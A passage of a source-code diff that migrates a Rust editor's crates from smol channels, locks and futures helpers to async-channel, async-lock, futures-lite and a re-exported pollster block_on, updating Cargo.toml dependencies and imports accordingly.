metadata_call_count: usize, @@ -1720,7 +1720,7 @@ impl FakeFs { const SYSTEMTIME_INTERVAL: Duration = Duration::from_nanos(100); pub fn new(executor: gpui::BackgroundExecutor) -> Arc { - let (tx, rx) = smol::channel::bounded::(10); + let (tx, rx) = async_channel::bounded::(10); let this = Arc::new_cyclic(|this| Self { this: this.clone(), @@ -2714,7 +2714,7 @@ impl FakeFsEntry { #[cfg(feature = "test-support")] struct FakeWatcher { - tx: smol::channel::Sender>, + tx: async_channel::Sender>, original_path: PathBuf, fs_state: Arc>, prefixes: Mutex>, @@ -3183,7 +3183,7 @@ impl Fs for FakeFs { Arc, ) { self.simulate_random_delay().await; - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let path = path.to_path_buf(); self.state.lock().event_txs.push((path.clone(), tx.clone())); let executor = self.executor.clone(); diff --git a/crates/fs/src/fs_watcher.rs b/crates/fs/src/fs_watcher.rs index 909424558b7554..6db36992dece57 100644 --- a/crates/fs/src/fs_watcher.rs +++ b/crates/fs/src/fs_watcher.rs @@ -19,7 +19,7 @@ pub enum WatcherMode { } pub struct FsWatcher { - tx: smol::channel::Sender<()>, + tx: async_channel::Sender<()>, pending_path_events: Arc>>, registrations: Mutex, WatcherRegistrationId>>, mode: WatcherMode, @@ -27,7 +27,7 @@ pub struct FsWatcher { impl FsWatcher { pub fn new( - tx: smol::channel::Sender<()>, + tx: async_channel::Sender<()>, pending_path_events: Arc>>, mode: WatcherMode, ) -> Self { diff --git a/crates/fs/tests/integration/fs.rs b/crates/fs/tests/integration/fs.rs index 97ec90bea09651..b27e4113fd6cf7 100644 --- a/crates/fs/tests/integration/fs.rs +++ b/crates/fs/tests/integration/fs.rs @@ -439,7 +439,7 @@ async fn test_realfs_atomic_write(executor: BackgroundExecutor) { // drop(file); // We still hold the file handle here let content = std::fs::read_to_string(&file_to_be_replaced).unwrap(); assert_eq!(content, "Hello"); - smol::block_on(fs.atomic_write(file_to_be_replaced.clone(), 
"World".into())).unwrap(); + gpui::block_on(fs.atomic_write(file_to_be_replaced.clone(), "World".into())).unwrap(); let content = std::fs::read_to_string(&file_to_be_replaced).unwrap(); assert_eq!(content, "World"); } @@ -449,7 +449,7 @@ async fn test_realfs_atomic_write_non_existing_file(executor: BackgroundExecutor let fs = RealFs::new(None, executor); let temp_dir = TempDir::new().unwrap(); let file_to_be_replaced = temp_dir.path().join("file.txt"); - smol::block_on(fs.atomic_write(file_to_be_replaced.clone(), "Hello".into())).unwrap(); + gpui::block_on(fs.atomic_write(file_to_be_replaced.clone(), "Hello".into())).unwrap(); let content = std::fs::read_to_string(&file_to_be_replaced).unwrap(); assert_eq!(content, "Hello"); } @@ -594,7 +594,7 @@ async fn test_realfs_broken_symlink_metadata(executor: BackgroundExecutor) { let path = tempdir.path(); let fs = RealFs::new(None, executor); let symlink_path = path.join("symlink"); - smol::block_on(fs.create_symlink(&symlink_path, PathBuf::from("file_a.txt"))).unwrap(); + gpui::block_on(fs.create_symlink(&symlink_path, PathBuf::from("file_a.txt"))).unwrap(); let metadata = fs .metadata(&symlink_path) .await @@ -614,7 +614,7 @@ async fn test_realfs_symlink_loop_metadata(executor: BackgroundExecutor) { let path = tempdir.path(); let fs = RealFs::new(None, executor); let symlink_path = path.join("symlink"); - smol::block_on(fs.create_symlink(&symlink_path, PathBuf::from("symlink"))).unwrap(); + gpui::block_on(fs.create_symlink(&symlink_path, PathBuf::from("symlink"))).unwrap(); let metadata = fs .metadata(&symlink_path) .await diff --git a/crates/git/Cargo.toml b/crates/git/Cargo.toml index 23a937bf1fa174..a96d8cbe0a9a0b 100644 --- a/crates/git/Cargo.toml +++ b/crates/git/Cargo.toml @@ -32,6 +32,7 @@ rope.workspace = true schemars.workspace = true serde.workspace = true smallvec.workspace = true +async-channel.workspace = true smol.workspace = true sum_tree.workspace = true text.workspace = true diff --git 
a/crates/git/src/repository.rs b/crates/git/src/repository.rs index c67e8c1e650ad5..c436ffbf6dfb8d 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -3,6 +3,7 @@ use crate::stash::GitStash; use crate::status::{DiffTreeType, GitStatus, StatusCode, TreeDiff}; use crate::{Oid, RunHook, SHORT_SHA_LENGTH}; use anyhow::{Context as _, Result, anyhow, bail}; +use async_channel::Sender; use collections::HashMap; use futures::channel::oneshot; use futures::future::BoxFuture; @@ -15,7 +16,6 @@ use rope::Rope; use schemars::JsonSchema; use serde::Deserialize; use smallvec::SmallVec; -use smol::channel::Sender; use smol::io::{AsyncBufReadExt, AsyncReadExt, BufReader}; use text::LineEnding; @@ -123,7 +123,7 @@ struct CommitDataRequest { } pub struct CommitDataReader { - request_tx: smol::channel::Sender, + request_tx: async_channel::Sender, _task: Task<()>, } @@ -3068,7 +3068,7 @@ impl GitRepository for RealGitRepository { fn commit_data_reader(&self) -> Result { let git_binary = self.git_binary()?; - let (request_tx, request_rx) = smol::channel::bounded::(64); + let (request_tx, request_rx) = async_channel::bounded::(64); let task = self.executor.spawn(async move { if let Err(error) = run_commit_data_reader(git_binary, request_rx).await { @@ -3094,7 +3094,7 @@ impl GitRepository for RealGitRepository { async fn run_commit_data_reader( git: GitBinary, - request_rx: smol::channel::Receiver, + request_rx: async_channel::Receiver, ) -> Result<()> { let mut process = git .build_command(&["cat-file", "--batch"]) diff --git a/crates/git_graph/Cargo.toml b/crates/git_graph/Cargo.toml index 55c054b138b132..7a8f78b46e7023 100644 --- a/crates/git_graph/Cargo.toml +++ b/crates/git_graph/Cargo.toml @@ -21,6 +21,7 @@ test-support = [ [dependencies] anyhow.workspace = true +async-channel.workspace = true collections.workspace = true db.workspace = true editor.workspace = true @@ -34,7 +35,6 @@ project_panel.workspace = true search.workspace = true 
settings.workspace = true smallvec.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true time.workspace = true diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 65b0894c2e64c5..e0f4afff467f90 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -1542,7 +1542,7 @@ impl GitGraph { return; } - let (request_tx, request_rx) = smol::channel::unbounded::(); + let (request_tx, request_rx) = async_channel::unbounded::(); repo.update(cx, |repo, cx| { repo.search_commits( diff --git a/crates/git_ui/Cargo.toml b/crates/git_ui/Cargo.toml index 1e2d7f79dd3203..19242ee3f0566b 100644 --- a/crates/git_ui/Cargo.toml +++ b/crates/git_ui/Cargo.toml @@ -29,6 +29,7 @@ editor.workspace = true file_icons.workspace = true fs.workspace = true futures.workspace = true +futures-lite.workspace = true fuzzy.workspace = true fuzzy_nucleo.workspace = true git.workspace = true @@ -55,7 +56,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true strum.workspace = true telemetry.workspace = true theme.workspace = true diff --git a/crates/git_ui/src/project_diff.rs b/crates/git_ui/src/project_diff.rs index 4a300a525740cb..67d9a96b2d6746 100644 --- a/crates/git_ui/src/project_diff.rs +++ b/crates/git_ui/src/project_diff.rs @@ -13,6 +13,7 @@ use editor::{ multibuffer_context_lines, scroll::Autoscroll, }; +use futures_lite::future::yield_now; use git::repository::DiffType; use git::{ @@ -33,7 +34,6 @@ use project::{ }, }; use settings::{Settings, SettingsStore}; -use smol::future::yield_now; use std::any::{Any, TypeId}; use std::sync::Arc; use theme::ActiveTheme; diff --git a/crates/gpui/src/gpui.rs b/crates/gpui/src/gpui.rs index dbb57f46efc376..9f307f56b8fadc 100644 --- a/crates/gpui/src/gpui.rs +++ b/crates/gpui/src/gpui.rs @@ -122,6 +122,8 @@ pub use util::{FutureExt, Timeout}; pub use view::*; pub use 
window::*; +pub use pollster::block_on; + /// The context trait, allows the different contexts in GPUI to be used /// interchangeably for certain operations. pub trait AppContext { diff --git a/crates/gpui/src/test.rs b/crates/gpui/src/test.rs index 2ee45f899c3941..9f224871330d90 100644 --- a/crates/gpui/src/test.rs +++ b/crates/gpui/src/test.rs @@ -207,7 +207,7 @@ pub fn observe(entity: &Entity, cx: &mut TestAppContext) -> Obser let (tx, rx) = async_channel::unbounded(); let _subscription = cx.update(|cx| { cx.observe(entity, move |_, _| { - let _ = pollster::block_on(tx.send(())); + let _ = gpui::block_on(tx.send(())); }) }); let rx = Box::pin(rx); diff --git a/crates/gpui_wgpu/src/wgpu_atlas.rs b/crates/gpui_wgpu/src/wgpu_atlas.rs index f3b9de1ca82e16..94b4b561c00b3b 100644 --- a/crates/gpui_wgpu/src/wgpu_atlas.rs +++ b/crates/gpui_wgpu/src/wgpu_atlas.rs @@ -399,8 +399,8 @@ fn swizzle_upload_data(bytes: &[u8], format: wgpu::TextureFormat) -> Vec { #[cfg(all(test, not(target_family = "wasm")))] mod tests { use super::*; + use gpui::block_on; use gpui::{ImageId, RenderImageParams}; - use pollster::block_on; use std::sync::Arc; fn test_device_and_queue() -> anyhow::Result<(Arc, Arc)> { diff --git a/crates/gpui_wgpu/src/wgpu_context.rs b/crates/gpui_wgpu/src/wgpu_context.rs index 2662a9289d0c1b..80900311b2d11b 100644 --- a/crates/gpui_wgpu/src/wgpu_context.rs +++ b/crates/gpui_wgpu/src/wgpu_context.rs @@ -44,7 +44,7 @@ impl WgpuContext { // Select an adapter by actually testing surface configuration with the real device. // This is the only reliable way to determine compatibility on hybrid GPU systems. 
let (adapter, device, queue, dual_source_blending, color_texture_format) = - pollster::block_on(Self::select_adapter_and_device( + gpui::block_on(Self::select_adapter_and_device( &instance, device_id_filter, surface, diff --git a/crates/language/Cargo.toml b/crates/language/Cargo.toml index 1392ed63f64b7d..b4d24765de9c90 100644 --- a/crates/language/Cargo.toml +++ b/crates/language/Cargo.toml @@ -35,6 +35,7 @@ ec4rs.workspace = true encoding_rs.workspace = true fs.workspace = true futures.workspace = true +futures-lite.workspace = true fuzzy.workspace = true globset.workspace = true gpui.workspace = true @@ -55,7 +56,6 @@ serde_json.workspace = true settings.workspace = true shellexpand.workspace = true smallvec.workspace = true -smol.workspace = true streaming-iterator.workspace = true strsim.workspace = true sum_tree.workspace = true diff --git a/crates/language/src/buffer.rs b/crates/language/src/buffer.rs index e15568affcc29f..ec3b4327e1b31d 100644 --- a/crates/language/src/buffer.rs +++ b/crates/language/src/buffer.rs @@ -27,6 +27,7 @@ use collections::{HashMap, HashSet}; use encoding_rs::Encoding; use fs::MTime; use futures::channel::oneshot; +use futures_lite::future::yield_now; use gpui::{ App, AppContext as _, Context, Entity, EventEmitter, HighlightStyle, SharedString, StyledText, Task, TextStyle, @@ -36,7 +37,6 @@ use lsp::LanguageServerId; use parking_lot::Mutex; use settings::WorktreeId; use smallvec::SmallVec; -use smol::future::yield_now; use std::{ any::Any, borrow::Cow, diff --git a/crates/language/src/buffer_tests.rs b/crates/language/src/buffer_tests.rs index 9f4562bf547f38..a13678a27d2821 100644 --- a/crates/language/src/buffer_tests.rs +++ b/crates/language/src/buffer_tests.rs @@ -3,6 +3,7 @@ use crate::Buffer; use clock::ReplicaId; use collections::BTreeMap; use futures::FutureExt as _; +use futures_lite::future::yield_now; use gpui::{App, AppContext as _, BorrowAppContext, Entity}; use gpui::{HighlightStyle, TestAppContext}; use indoc::indoc; 
@@ -559,7 +560,7 @@ async fn test_normalize_whitespace(cx: &mut gpui::TestAppContext) { // Spawn a task to format the buffer's whitespace. // Pause so that the formatting task starts running. let format = buffer.update(cx, |buffer, cx| buffer.remove_trailing_whitespace(cx)); - smol::future::yield_now().await; + yield_now().await; // Edit the buffer while the normalization task is running. let version_before_edit = buffer.update(cx, |buffer, _| buffer.version()); diff --git a/crates/language/src/language.rs b/crates/language/src/language.rs index ea8a0c69a1a85e..ef495d462b97b9 100644 --- a/crates/language/src/language.rs +++ b/crates/language/src/language.rs @@ -37,6 +37,7 @@ use http_client::HttpClient; pub use language_core::highlight_map::{HighlightId, HighlightMap}; +use futures::future::FutureExt as _; pub use language_core::{ BlockCommentConfig, BracketPair, BracketPairConfig, BracketPairContent, BracketsConfig, BracketsPatternConfig, CodeLabel, CodeLabelBuilder, DebugVariablesConfig, DebuggerTextObject, @@ -61,7 +62,6 @@ use regex::Regex; use semver::Version; use serde_json::Value; use settings::WorktreeId; -use smol::future::FutureExt as _; use std::{ ffi::OsStr, fmt::Debug, diff --git a/crates/language/src/language_registry.rs b/crates/language/src/language_registry.rs index 8c115af27d844e..a9d5777be01e5e 100644 --- a/crates/language/src/language_registry.rs +++ b/crates/language/src/language_registry.rs @@ -33,7 +33,7 @@ use sum_tree::Bias; use text::{Point, Rope}; use theme::Theme; use unicase::UniCase; -use util::{ResultExt, maybe, post_inc}; +use util::{maybe, post_inc}; pub struct LanguageRegistry { state: RwLock, @@ -1096,18 +1096,6 @@ impl LanguageRegistry { ) -> mpsc::UnboundedReceiver<(LanguageServerName, BinaryStatus)> { self.lsp_binary_status_tx.subscribe() } - - pub async fn delete_server_container(&self, name: LanguageServerName) { - log::info!("deleting server container"); - let Some(dir) = self.language_server_download_dir(&name) else { - 
return; - }; - - smol::fs::remove_dir_all(dir) - .await - .context("server container removal") - .log_err(); - } } impl LanguageRegistryState { diff --git a/crates/language_model_core/Cargo.toml b/crates/language_model_core/Cargo.toml index 7a6de00f3e4a77..e9aa06400b6d3c 100644 --- a/crates/language_model_core/Cargo.toml +++ b/crates/language_model_core/Cargo.toml @@ -14,6 +14,7 @@ doctest = false [dependencies] anyhow.workspace = true +async-lock.workspace = true cloud_llm_client.workspace = true futures.workspace = true gpui_shared_string.workspace = true @@ -22,6 +23,5 @@ partial-json-fixer.workspace = true schemars.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true strum.workspace = true thiserror.workspace = true diff --git a/crates/language_model_core/src/rate_limiter.rs b/crates/language_model_core/src/rate_limiter.rs index 790be05ac069b8..28e92056f9de6e 100644 --- a/crates/language_model_core/src/rate_limiter.rs +++ b/crates/language_model_core/src/rate_limiter.rs @@ -1,5 +1,5 @@ +use async_lock::{Semaphore, SemaphoreGuardArc}; use futures::Stream; -use smol::lock::{Semaphore, SemaphoreGuardArc}; use std::{ future::Future, pin::Pin, diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index f5828fa28d7064..c74526dba23855 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -13,6 +13,7 @@ path = "src/language_models.rs" [dependencies] ai_onboarding.workspace = true +async-lock.workspace = true anthropic = { workspace = true, features = ["schemars"] } anyhow.workspace = true aws-config = { workspace = true, features = ["behavior-version-latest"] } @@ -55,7 +56,6 @@ schemars.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true strum.workspace = true tokio = { workspace = true, features = ["rt", "rt-multi-thread"] } ui.workspace = true diff --git 
a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index 1069ad80fc0249..1a8d477192ec55 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -2,6 +2,7 @@ use std::pin::Pin; use std::sync::Arc; use anyhow::{Context as _, Result, anyhow}; +use async_lock::OnceCell; use aws_config::stalled_stream_protection::StalledStreamProtectionConfig; use aws_config::{BehaviorVersion, Region}; use aws_credential_types::{Credentials, Token}; @@ -40,7 +41,6 @@ use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use serde_json::Value; use settings::{BedrockAvailableModel as AvailableModel, Settings, SettingsStore}; -use smol::lock::OnceCell; use std::sync::LazyLock; use strum::{EnumIter, IntoEnumIterator, IntoStaticStr}; use ui::{ButtonLink, ConfiguredApiCard, Divider, List, ListBulletItem, prelude::*}; diff --git a/crates/language_models_cloud/Cargo.toml b/crates/language_models_cloud/Cargo.toml index de82fdfa627829..e861a8dbf48a1c 100644 --- a/crates/language_models_cloud/Cargo.toml +++ b/crates/language_models_cloud/Cargo.toml @@ -25,7 +25,6 @@ schemars.workspace = true semver.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true thiserror.workspace = true [dev-dependencies] diff --git a/crates/language_models_cloud/src/language_models_cloud.rs b/crates/language_models_cloud/src/language_models_cloud.rs index da5659bf508d4e..9d04e100c09085 100644 --- a/crates/language_models_cloud/src/language_models_cloud.rs +++ b/crates/language_models_cloud/src/language_models_cloud.rs @@ -7,8 +7,9 @@ use cloud_llm_client::{ SERVER_SUPPORTS_STATUS_MESSAGES_HEADER_NAME, ZED_VERSION_HEADER_NAME, }; use futures::{ - AsyncBufReadExt, FutureExt, Stream, StreamExt, + AsyncBufReadExt, AsyncReadExt as _, FutureExt, Stream, StreamExt, future::BoxFuture, + io::BufReader, stream::{self, BoxStream}, }; use google_ai::GoogleModelMode; @@ -30,7 +31,6 @@ 
use language_model::{ use schemars::JsonSchema; use semver::Version; use serde::{Deserialize, Serialize, de::DeserializeOwned}; -use smol::io::{AsyncReadExt, BufReader}; use std::collections::VecDeque; use std::pin::Pin; use std::str::FromStr; diff --git a/crates/multi_buffer/Cargo.toml b/crates/multi_buffer/Cargo.toml index a06599999c8147..5dccddaba62735 100644 --- a/crates/multi_buffer/Cargo.toml +++ b/crates/multi_buffer/Cargo.toml @@ -26,6 +26,7 @@ anyhow.workspace = true clock.workspace = true collections.workspace = true ctor.workspace = true +futures-lite.workspace = true buffer_diff.workspace = true gpui.workspace = true itertools.workspace = true @@ -34,7 +35,6 @@ log.workspace = true parking_lot.workspace = true rand.workspace = true rope.workspace = true -smol.workspace = true settings.workspace = true serde.workspace = true smallvec.workspace = true diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index 59272d4b7c582f..8b7b1002d96dac 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -16,6 +16,7 @@ use buffer_diff::{ }; use clock::ReplicaId; use collections::{BTreeMap, Bound, HashMap, HashSet, IndexSet}; +use futures_lite::future::yield_now; use gpui::{App, Context, Entity, EventEmitter}; use itertools::Itertools; use language::{ @@ -33,7 +34,6 @@ use gpui::AppContext as _; use rope::DimensionPair; use settings::Settings; use smallvec::SmallVec; -use smol::future::yield_now; use std::{ any::type_name, borrow::Cow, diff --git a/crates/notifications/Cargo.toml b/crates/notifications/Cargo.toml index e0640c67cc55b3..b03a658655fb47 100644 --- a/crates/notifications/Cargo.toml +++ b/crates/notifications/Cargo.toml @@ -24,8 +24,8 @@ test-support = [ anyhow.workspace = true channel.workspace = true client.workspace = true +futures-lite.workspace = true component.workspace = true -db.workspace = true gpui.workspace = true rpc.workspace = true sum_tree.workspace = 
true diff --git a/crates/notifications/src/notification_store.rs b/crates/notifications/src/notification_store.rs index f30a018811db82..2e23b945a6f947 100644 --- a/crates/notifications/src/notification_store.rs +++ b/crates/notifications/src/notification_store.rs @@ -1,7 +1,7 @@ use anyhow::{Context as _, Result}; use channel::ChannelStore; use client::{ChannelId, Client, UserStore}; -use db::smol::stream::StreamExt; +use futures_lite::stream::StreamExt; use gpui::{App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task}; use rpc::{Notification, TypedEnvelope, proto}; use std::{ops::Range, sync::Arc}; diff --git a/crates/outline/Cargo.toml b/crates/outline/Cargo.toml index 2ce031bd4605e6..84d596b761fea8 100644 --- a/crates/outline/Cargo.toml +++ b/crates/outline/Cargo.toml @@ -20,7 +20,6 @@ language.workspace = true ordered-float.workspace = true picker.workspace = true settings.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true ui.workspace = true @@ -40,3 +39,4 @@ rope.workspace = true serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } +futures.workspace = true diff --git a/crates/outline/src/outline.rs b/crates/outline/src/outline.rs index af5671632fdac1..78c4d9c148eec3 100644 --- a/crates/outline/src/outline.rs +++ b/crates/outline/src/outline.rs @@ -454,13 +454,13 @@ mod tests { use std::time::Duration; use super::*; + use futures::stream::StreamExt as _; use gpui::{TestAppContext, UpdateGlobal, VisualTestContext}; use indoc::indoc; use language::FakeLspAdapter; use project::{FakeFs, Project}; use serde_json::json; use settings::SettingsStore; - use smol::stream::StreamExt as _; use util::{path, rel_path::rel_path}; use workspace::{AppState, MultiWorkspace, Workspace}; diff --git a/crates/outline_panel/Cargo.toml b/crates/outline_panel/Cargo.toml index e88a0262907fcb..a5bbf3f7ccc2d2 100644 --- 
a/crates/outline_panel/Cargo.toml +++ b/crates/outline_panel/Cargo.toml @@ -14,11 +14,13 @@ doctest = false [dependencies] anyhow.workspace = true +async-channel.workspace = true collections.workspace = true db.workspace = true editor.workspace = true file_icons.workspace = true fuzzy.workspace = true +futures.workspace = true gpui.workspace = true itertools.workspace = true language.workspace = true @@ -31,7 +33,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true ui.workspace = true diff --git a/crates/outline_panel/src/outline_panel.rs b/crates/outline_panel/src/outline_panel.rs index 4a30f2ff8743c1..7b378c6fb8283f 100644 --- a/crates/outline_panel/src/outline_panel.rs +++ b/crates/outline_panel/src/outline_panel.rs @@ -46,7 +46,6 @@ use project::{File, Fs, GitEntry, GitTraversal, Project, ProjectItem}; use search::{BufferSearchBar, ProjectSearchView}; use serde::{Deserialize, Serialize}; use settings::{Settings, SettingsStore}; -use smol::channel; use theme::SyntaxTheme; use theme_settings::ThemeSettings; use ui::{ @@ -156,7 +155,7 @@ struct SearchState { kind: SearchKind, query: String, matches: Vec<(Range, Arc>)>, - highlight_search_match_tx: channel::Sender, + highlight_search_match_tx: async_channel::Sender, _search_match_highlighter: Task<()>, _search_match_notify: Task<()>, } @@ -177,8 +176,8 @@ impl SearchState { window: &mut Window, cx: &mut Context, ) -> Self { - let (highlight_search_match_tx, highlight_search_match_rx) = channel::unbounded(); - let (notify_tx, notify_rx) = channel::unbounded::<()>(); + let (highlight_search_match_tx, highlight_search_match_rx) = async_channel::unbounded(); + let (notify_tx, notify_rx) = async_channel::unbounded::<()>(); Self { kind, query, @@ -5249,6 +5248,7 @@ impl GenerationState { #[cfg(test)] mod tests { use db::indoc; + use futures::stream::StreamExt as _; use 
gpui::{TestAppContext, UpdateGlobal, VisualTestContext, WindowHandle}; use language::{self, FakeLspAdapter, markdown_lang, rust_lang}; use pretty_assertions::assert_eq; @@ -5258,7 +5258,6 @@ mod tests { project_search::{self, perform_project_search}, }; use serde_json::json; - use smol::stream::StreamExt as _; use util::path; use workspace::{MultiWorkspace, OpenOptions, OpenVisible, ToolbarItemView}; diff --git a/crates/project/Cargo.toml b/crates/project/Cargo.toml index 628e979aab939a..3a27bf4de61249 100644 --- a/crates/project/Cargo.toml +++ b/crates/project/Cargo.toml @@ -38,6 +38,7 @@ aho-corasick.workspace = true anyhow.workspace = true askpass.workspace = true async-trait.workspace = true +async-channel.workspace = true base64.workspace = true buffer_diff.workspace = true circular-buffer.workspace = true diff --git a/crates/project/src/buffer_store.rs b/crates/project/src/buffer_store.rs index b5828d60689d6a..2e234a7f936e7b 100644 --- a/crates/project/src/buffer_store.rs +++ b/crates/project/src/buffer_store.rs @@ -46,7 +46,7 @@ pub struct BufferStore { #[derive(Default)] struct RemoteProjectSearchState { // List of ongoing project search chunks from our remote host. Used by the side issuing a search RPC request. - chunks: HashMap>, + chunks: HashMap>, // Monotonously-increasing handle to hand out to remote host in order to identify the project search result chunk. next_id: u64, // Used by the side running the actual search for match candidates to potentially cancel the search prematurely. 
@@ -1716,8 +1716,8 @@ impl BufferStore { pub(crate) fn register_project_search_result_handle( &mut self, - ) -> (u64, smol::channel::Receiver) { - let (tx, rx) = smol::channel::unbounded(); + ) -> (u64, async_channel::Receiver) { + let (tx, rx) = async_channel::unbounded(); let handle = util::post_inc(&mut self.project_search.next_id); let _old_entry = self.project_search.chunks.insert(handle, tx); debug_assert!(_old_entry.is_none()); diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 22dd3123ed2192..71eaca61cfd32c 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -310,7 +310,7 @@ pub struct JobInfo { struct CommitDataHandler { _task: Task<()>, - commit_data_request: smol::channel::Sender, + commit_data_request: async_channel::Sender, completion_senders: HashMap>>, pending_requests: HashSet, } @@ -4812,7 +4812,7 @@ impl Repository { &mut self, log_source: LogSource, search_args: SearchCommitArgs, - request_tx: smol::channel::Sender, + request_tx: async_channel::Sender, cx: &mut Context, ) { let repository_state = self.repository_state.clone(); @@ -4912,7 +4912,7 @@ impl Repository { cx: &mut AsyncApp, ) -> Result<(), SharedString> { let (request_tx, request_rx) = - smol::channel::unbounded::>>(); + async_channel::unbounded::>>(); let task = cx.background_executor().spawn({ let log_source = log_source.clone(); @@ -5029,8 +5029,8 @@ impl Repository { fn open_commit_data_handler(&self, cx: &Context) -> CommitDataHandler { let state = self.repository_state.clone(); - let (result_tx, result_rx) = smol::channel::bounded::<(Oid, CommitData)>(64); - let (request_tx, request_rx) = smol::channel::unbounded::(); + let (result_tx, result_rx) = async_channel::bounded::<(Oid, CommitData)>(64); + let (request_tx, request_rx) = async_channel::unbounded::(); let foreground_task = cx.spawn(async move |this, cx| { while let Ok((sha, commit_data)) = result_rx.recv().await { diff --git 
a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index a61eab730e26cf..483f1252c4d10b 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -1180,7 +1180,7 @@ impl LocalLspStore { async move { let actions = params.actions.unwrap_or_default(); let message = params.message.clone(); - let (tx, rx) = smol::channel::bounded::(1); + let (tx, rx) = async_channel::bounded::(1); let level = match params.typ { lsp::MessageType::ERROR => PromptLevel::Critical, lsp::MessageType::WARNING => PromptLevel::Warning, @@ -1226,7 +1226,7 @@ impl LocalLspStore { let name = name.to_string(); let mut cx = cx.clone(); - let (tx, _) = smol::channel::bounded(1); + let (tx, _) = async_channel::bounded(1); let level = match params.typ { lsp::MessageType::ERROR => PromptLevel::Critical, lsp::MessageType::WARNING => PromptLevel::Warning, @@ -13978,7 +13978,7 @@ pub struct LanguageServerPromptRequest { pub message: String, pub actions: Vec, pub lsp_name: String, - pub(crate) response_channel: smol::channel::Sender, + pub(crate) response_channel: async_channel::Sender, } impl LanguageServerPromptRequest { @@ -13987,7 +13987,7 @@ impl LanguageServerPromptRequest { message: String, actions: Vec, lsp_name: String, - response_channel: smol::channel::Sender, + response_channel: async_channel::Sender, ) -> Self { let id = NEXT_PROMPT_REQUEST_ID.fetch_add(1, atomic::Ordering::AcqRel); LanguageServerPromptRequest { @@ -14014,7 +14014,7 @@ impl LanguageServerPromptRequest { actions: Vec, lsp_name: String, ) -> Self { - let (tx, _rx) = smol::channel::unbounded(); + let (tx, _rx) = async_channel::unbounded(); LanguageServerPromptRequest::new(level, message, actions, lsp_name, tx) } } diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index ea400e28e86f9c..c0b39c33dd7263 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -5224,7 +5224,7 @@ impl Project { envelope: TypedEnvelope, mut cx: AsyncApp, ) -> 
Result { - let (tx, rx) = smol::channel::bounded(1); + let (tx, rx) = async_channel::bounded(1); let actions: Vec<_> = envelope .payload .actions diff --git a/crates/project/src/project_search.rs b/crates/project/src/project_search.rs index a1914670162163..2db893538c837e 100644 --- a/crates/project/src/project_search.rs +++ b/crates/project/src/project_search.rs @@ -10,6 +10,7 @@ use std::{ }; use anyhow::Context; +use async_channel::{Receiver, Sender, bounded, unbounded}; use collections::HashSet; use fs::Fs; use futures::FutureExt as _; @@ -19,7 +20,6 @@ use language::{Buffer, BufferSnapshot}; use parking_lot::Mutex; use postage::oneshot; use rpc::{AnyProtoClient, proto}; -use smol::channel::{Receiver, Sender, bounded, unbounded}; use util::{ResultExt, maybe, paths::compare_rel_paths, rel_path::RelPath}; use worktree::{Entry, ProjectEntryId, Snapshot, Worktree, WorktreeSettings}; diff --git a/crates/project/src/terminals.rs b/crates/project/src/terminals.rs index e22af5d552fa8e..aa0f94ef7078f3 100644 --- a/crates/project/src/terminals.rs +++ b/crates/project/src/terminals.rs @@ -2,12 +2,12 @@ use anyhow::Result; use collections::HashMap; use gpui::{App, AppContext as _, Context, Entity, Task, WeakEntity}; +use async_channel::bounded; use futures::{FutureExt, future::Shared}; use itertools::Itertools as _; use language::LanguageName; use remote::RemoteClient; use settings::{Settings, SettingsLocation}; -use smol::channel::bounded; use std::{ path::{Path, PathBuf}, sync::Arc, diff --git a/crates/recent_projects/Cargo.toml b/crates/recent_projects/Cargo.toml index fbb7bb31a939c2..6062aaa8a9036c 100644 --- a/crates/recent_projects/Cargo.toml +++ b/crates/recent_projects/Cargo.toml @@ -44,7 +44,6 @@ semver.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true task.workspace = true telemetry.workspace = true ui.workspace = true diff --git a/crates/recent_projects/src/remote_servers.rs 
